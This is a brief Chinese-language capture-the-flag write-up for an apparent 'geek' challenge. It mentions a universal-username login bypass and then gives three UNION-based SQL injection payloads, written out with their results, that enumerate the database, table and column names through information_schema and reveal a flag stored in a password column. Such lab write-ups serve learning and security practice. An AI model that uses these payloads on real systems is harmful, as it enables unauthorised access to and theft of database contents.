万能用户名(密码随便)
登录进去以后发现是这个东西,然而并没有什么卵用
然后就开始爆破数据库名字--表名--列名
注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名
1.1' union select 1,2,database() #
(爆出来数据库名字是 geek)
2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #
(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)
3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#
(爆出来有id(永远都是1)和username和password还有flag)
这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见